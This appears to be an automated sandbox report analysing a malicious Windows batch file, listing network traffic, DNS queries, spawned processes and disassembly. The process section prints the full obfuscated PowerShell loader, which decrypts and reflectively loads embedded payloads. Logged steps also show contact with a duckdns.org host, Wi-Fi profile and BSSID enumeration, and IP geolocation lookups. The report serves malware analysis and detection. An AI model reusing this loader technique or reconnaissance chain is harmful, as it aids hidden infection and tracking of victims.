                                                                                      Apr 25, 2024 22:48:56.120898008 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:49:00.371303082 CEST497373232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:49:00.620822906 CEST32324973791.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:49:00.620980978 CEST497373232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:49:00.870743036 CEST32324973791.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:49:06.089972019 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:49:06.339762926 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:49:06.339876890 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:49:06.605133057 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:49:06.605217934 CEST497303232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:49:06.608076096 CEST497373232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:49:06.855067015 CEST32324973091.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:49:06.855096102 CEST32324973791.92.249.117192.168.2.4
                                                                                      Apr 25, 2024 22:49:06.855283022 CEST497373232192.168.2.491.92.249.117
                                                                                      Apr 25, 2024 22:49:07.105365038 CEST32324973791.92.249.117192.168.2.4

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 25, 2024 22:45:09.264379978 CEST6218953192.168.2.41.1.1.1
                                                                                      Apr 25, 2024 22:45:10.261727095 CEST6218953192.168.2.41.1.1.1
                                                                                      Apr 25, 2024 22:45:11.261519909 CEST6218953192.168.2.41.1.1.1
                                                                                      Apr 25, 2024 22:45:11.358918905 CEST53621891.1.1.1192.168.2.4
                                                                                      Apr 25, 2024 22:45:11.358975887 CEST53621891.1.1.1192.168.2.4
                                                                                      Apr 25, 2024 22:45:11.372200966 CEST53621891.1.1.1192.168.2.4
                                                                                      Apr 25, 2024 22:45:26.243180037 CEST6141753192.168.2.41.1.1.1
                                                                                      Apr 25, 2024 22:45:26.354664087 CEST53614171.1.1.1192.168.2.4
                                                                                      Apr 25, 2024 22:45:26.597270012 CEST5187753192.168.2.41.1.1.1
                                                                                      Apr 25, 2024 22:45:26.709017992 CEST53518771.1.1.1192.168.2.4
                                                                                      Apr 25, 2024 22:45:26.794485092 CEST6543053192.168.2.41.1.1.1
                                                                                      Apr 25, 2024 22:45:26.905461073 CEST53654301.1.1.1192.168.2.4
                                                                                      Apr 25, 2024 22:45:27.692801952 CEST5871253192.168.2.41.1.1.1
                                                                                      Apr 25, 2024 22:45:27.807138920 CEST53587121.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Apr 25, 2024 22:45:09.264379978 CEST192.168.2.41.1.1.10x358Standard query (0)dcxwq1.duckdns.orgA (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:10.261727095 CEST192.168.2.41.1.1.10x358Standard query (0)dcxwq1.duckdns.orgA (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:11.261519909 CEST192.168.2.41.1.1.10x358Standard query (0)dcxwq1.duckdns.orgA (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:26.243180037 CEST192.168.2.41.1.1.10x59b8Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:26.597270012 CEST192.168.2.41.1.1.10x4f12Standard query (0)27.58.7.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:26.794485092 CEST192.168.2.41.1.1.10x58d2Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:27.692801952 CEST192.168.2.41.1.1.10xe13Standard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Apr 25, 2024 22:45:11.358918905 CEST1.1.1.1192.168.2.40x358No error (0)dcxwq1.duckdns.org91.92.249.117A (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:11.358975887 CEST1.1.1.1192.168.2.40x358No error (0)dcxwq1.duckdns.org91.92.249.117A (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:11.372200966 CEST1.1.1.1192.168.2.40x358No error (0)dcxwq1.duckdns.org91.92.249.117A (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:26.354664087 CEST1.1.1.1192.168.2.40x59b8No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:26.354664087 CEST1.1.1.1192.168.2.40x59b8No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:26.709017992 CEST1.1.1.1192.168.2.40x4f12Name error (3)27.58.7.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:26.905461073 CEST1.1.1.1192.168.2.40x58d2No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:27.807138920 CEST1.1.1.1192.168.2.40xe13No error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                                                      Apr 25, 2024 22:45:27.807138920 CEST1.1.1.1192.168.2.40xe13No error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • api.mylnikov.org
                                                                                      • icanhazip.com
                                                                                      • ip-api.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449738104.16.185.241806972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 25, 2024 22:45:26.468893051 CEST63OUTGET / HTTP/1.1
                                                                                      Host: icanhazip.com
                                                                                      Connection: Keep-Alive
                                                                                      Apr 25, 2024 22:45:26.586585045 CEST537INHTTP/1.1 200 OK
                                                                                      Date: Thu, 25 Apr 2024 20:45:26 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 15
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET
                                                                                      Set-Cookie: __cf_bm=7uUawQZBpOQdzjfX8wdOvX48BhIpj7Ak7yTGgLfds4M-1714077926-1.0.1.1-AqL7SCq.MzRZ3pOYseT_dT_POlBVPLRMR5pDWH_zAWfJkLPIyMOmHrppWd__jV7wzojZXpMnPCaa1vSpD6ZoBA; path=/; expires=Thu, 25-Apr-24 21:15:26 GMT; domain=.icanhazip.com; HttpOnly
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 87a12d40cddaade3-ATL
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      Data Raw: 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0a
                                                                                      Data Ascii: 185.152.66.230
                                                                                      Apr 25, 2024 22:45:27.216010094 CEST39OUTGET / HTTP/1.1
                                                                                      Host: icanhazip.com
                                                                                      Apr 25, 2024 22:45:27.331571102 CEST537INHTTP/1.1 200 OK
                                                                                      Date: Thu, 25 Apr 2024 20:45:27 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 15
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET
                                                                                      Set-Cookie: __cf_bm=BlFCMu7ok46N.dn6DmuWQL8bIw8L81ud1He4QdL2sEA-1714077927-1.0.1.1-WUUDKivuLaW6NrHYpbBEdDoI3sXzCjA7aMtx3KAiBHWdXuQgBX5DQbTEWnqmgV4TxzFBzd7QlbwI7rPfx2b34Q; path=/; expires=Thu, 25-Apr-24 21:15:27 GMT; domain=.icanhazip.com; HttpOnly
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 87a12d457d69ade3-ATL
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      Data Raw: 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0a
                                                                                      Data Ascii: 185.152.66.230
                                                                                      Apr 25, 2024 22:45:27.539827108 CEST39OUTGET / HTTP/1.1
                                                                                      Host: icanhazip.com
                                                                                      Apr 25, 2024 22:45:27.656908989 CEST537INHTTP/1.1 200 OK
                                                                                      Date: Thu, 25 Apr 2024 20:45:27 GMT
                                                                                      Content-Type: text/plain
                                                                                      Content-Length: 15
                                                                                      Connection: keep-alive
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET
                                                                                      Set-Cookie: __cf_bm=oN5YKg26VEw_zWNJrntv7pXjSB1LLSuH_epnoftpR_k-1714077927-1.0.1.1-RczymOcMu2uug0.9G1Mxeoc8qeNQV3zkrOPMBqAUlE_F_37d5VjnV6i.2LQQ6n1lAU.ytWr0bu4wpjpXZhnkaQ; path=/; expires=Thu, 25-Apr-24 21:15:27 GMT; domain=.icanhazip.com; HttpOnly
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 87a12d4778e1ade3-ATL
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      Data Raw: 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0a
                                                                                      Data Ascii: 185.152.66.230


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449739208.95.112.1806972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Apr 25, 2024 22:45:27.029390097 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                      Host: ip-api.com
                                                                                      Connection: Keep-Alive
                                                                                      Apr 25, 2024 22:45:27.154426098 CEST174INHTTP/1.1 200 OK
                                                                                      Date: Thu, 25 Apr 2024 20:45:26 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 5
                                                                                      Access-Control-Allow-Origin: *
                                                                                      X-Ttl: 60
                                                                                      X-Rl: 44
                                                                                      Data Raw: 74 72 75 65 0a
                                                                                      Data Ascii: true


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.449740104.21.44.664436972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-04-25 20:45:28 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                                                      Host: api.mylnikov.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-04-25 20:45:29 UTC783INHTTP/1.1 200 OK
                                                                                      Date: Thu, 25 Apr 2024 20:45:29 GMT
                                                                                      Content-Type: application/json; charset=utf8
                                                                                      Content-Length: 88
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: max-age=2678400
                                                                                      CF-Cache-Status: MISS
                                                                                      Last-Modified: Thu, 25 Apr 2024 20:45:29 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwZmUf71w0e7yN%2BIepu5Mia7%2BuU57v3cMssDwEB1dz94wQL%2B8SGEFFFCkhqpOzOZNBzZ%2B37rZseAny0BXyOEqsyovy8C%2FK4ckSWuzxqftw9zkvo2zpGwobop1VQL4YSPeMoD"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Strict-Transport-Security: max-age=0; preload
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 87a12d4b8f4044d1-ATL
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-04-25 20:45:29 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 34 30 37 37 39 32 39 7d
                                                                                      Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1714077929}


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\a.cmd" "
                                                                                      Imagebase:0x7ff754a80000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd /c \"set __=^&rem\
                                                                                      Imagebase:0x7ff754a80000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\a.cmd"
                                                                                      Imagebase:0x7ff754a80000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd /c \"set __=^&rem\
                                                                                      Imagebase:0x7ff754a80000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\a.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rvnjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rvnjY.Key=[System.Convert]::($LzXa[3])('4RFBdW1/zR2QfqFXFvckJggLRbhWPlZ+NeGOFVeQyfc=');$rvnjY.IV=[System.Convert]::($LzXa[3])('/1MUg0yozSO51Z+kagFGTw==');$LixCy=$rvnjY.($LzXa[2])();$eKenk=$LixCy.($LzXa[5])($UARpu,0,$UARpu.Length);$LixCy.Dispose();$rvnjY.Dispose();$eKenk;}function znPjO($UARpu){$WVzHv=New-Object System.IO.MemoryStream(,$UARpu);$OjCYY=New-Object System.IO.MemoryStream;$vQDXk=New-Object System.IO.Compression.GZipStream($WVzHv,[IO.Compression.CompressionMode]::($LzXa[4]));$vQDXk.($LzXa[9])($OjCYY);$vQDXk.Dispose();$WVzHv.Dispose();$OjCYY.Dispose();$OjCYY.ToArray();}$PzMvs=[System.IO.File]::($LzXa[0])([Console]::Title);$pfOyV=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 5).Substring(2))));$eOZhb=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 6).Substring(2))));[System.Reflection.Assembly]::($LzXa[13])([byte[]]$eOZhb).($LzXa[8]).($LzXa[12])($null,$null);[System.Reflection.Assembly]::($LzXa[13])([byte[]]$pfOyV).($LzXa[8]).($LzXa[12])($null,$null); "
                                                                                      Imagebase:0x7ff754a80000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:22:44:59
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Imagebase:0x7ff788560000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:22:45:02
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                      Imagebase:0x7ff788560000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                      Imagebase:0x7ff754a80000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:chcp 65001
                                                                                      Imagebase:0x7ff6968c0000
                                                                                      File size:14'848 bytes
                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:netsh wlan show profile
                                                                                      Imagebase:0x7ff767440000
                                                                                      File size:96'768 bytes
                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:findstr All
                                                                                      Imagebase:0x7ff602620000
                                                                                      File size:36'352 bytes
                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                      Imagebase:0x7ff754a80000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:chcp 65001
                                                                                      Imagebase:0x7ff6968c0000
                                                                                      File size:14'848 bytes
                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:22:45:24
                                                                                      Start date:25/04/2024
                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:netsh wlan show networks mode=bssid
                                                                                      Imagebase:0x7ff767440000
                                                                                      File size:96'768 bytes
                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:8
                                                                                        Total number of Limit Nodes:1
                                                                                        execution_graph 13397 7ffd9b88d4f9 13399 7ffd9b88d50f 13397->13399 13398 7ffd9b88d552 13399->13398 13400 7ffd9b88d67d CreateFileW 13399->13400 13401 7ffd9b88d6de 13400->13401 13402 7ffd9b8845ea 13403 7ffd9b8cfc40 GetFileType 13402->13403 13405 7ffd9b8cfcc4 13403->13405

                                                                                        Executed Functions

                                                                                        Function 00007FFD9B886DA0 Relevance: 11.3, Strings: 8, Instructions: 1315COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7ffd9b886da0-7ffd9b88c3c0 5 7ffd9b88c3cc-7ffd9b88c403 0->5 6 7ffd9b88c3c2-7ffd9b88c3c7 call 7ffd9b886e00 0->6 9 7ffd9b88c409-7ffd9b88c414 5->9 10 7ffd9b88c5f4-7ffd9b88c609 5->10 6->5 11 7ffd9b88c416-7ffd9b88c41e 9->11 12 7ffd9b88c482-7ffd9b88c487 9->12 20 7ffd9b88c60b-7ffd9b88c612 10->20 21 7ffd9b88c613-7ffd9b88c65e 10->21 11->10 16 7ffd9b88c424-7ffd9b88c439 11->16 13 7ffd9b88c489-7ffd9b88c495 12->13 14 7ffd9b88c4f3-7ffd9b88c4fd 12->14 13->10 19 7ffd9b88c49b-7ffd9b88c4ae 13->19 22 7ffd9b88c51f-7ffd9b88c527 14->22 23 7ffd9b88c4ff-7ffd9b88c51d call 7ffd9b886e20 14->23 17 7ffd9b88c43b-7ffd9b88c460 16->17 18 7ffd9b88c462-7ffd9b88c46d 16->18 17->18 29 7ffd9b88c4b0-7ffd9b88c4b3 17->29 18->10 25 7ffd9b88c473-7ffd9b88c480 18->25 26 7ffd9b88c52a-7ffd9b88c535 19->26 20->21 43 7ffd9b88c67b-7ffd9b88c68c 21->43 44 7ffd9b88c660-7ffd9b88c666 21->44 22->26 23->22 25->11 25->12 26->10 30 7ffd9b88c53b-7ffd9b88c556 26->30 33 7ffd9b88c4b5 29->33 34 7ffd9b88c4bf-7ffd9b88c4c7 29->34 30->10 32 7ffd9b88c55c-7ffd9b88c56f 30->32 32->10 37 7ffd9b88c575-7ffd9b88c586 32->37 33->34 34->10 38 7ffd9b88c4cd-7ffd9b88c4f2 34->38 37->10 45 7ffd9b88c588-7ffd9b88c597 37->45 48 7ffd9b88c69d-7ffd9b88c6c0 43->48 49 7ffd9b88c68e-7ffd9b88c699 43->49 46 7ffd9b88c668-7ffd9b88c679 44->46 47 7ffd9b88c6c1-7ffd9b88c73a 44->47 50 7ffd9b88c599-7ffd9b88c5a4 45->50 51 7ffd9b88c5e2-7ffd9b88c5f3 45->51 46->43 46->44 63 7ffd9b88c73c-7ffd9b88c74c 47->63 64 7ffd9b88c74e-7ffd9b88c75f 47->64 50->51 58 7ffd9b88c5a6-7ffd9b88c5dd call 7ffd9b886e20 50->58 58->51 63->63 63->64 65 7ffd9b88c770-7ffd9b88c7a1 64->65 66 7ffd9b88c761-7ffd9b88c76f 64->66 72 7ffd9b88c7f7-7ffd9b88c7fe 65->72 73 7ffd9b88c7a3-7ffd9b88c7a9 65->73 66->65 74 7ffd9b88c83f-7ffd9b88c868 72->74 75 7ffd9b88c800-7ffd9b88c801 72->75 73->72 76 7ffd9b88c7ab-7ffd9b88c7ac 73->76 77 7ffd9b88c804-7ffd9b88c807 75->77 78 7ffd9b88c7af-7ffd9b88c7b2 76->78 79 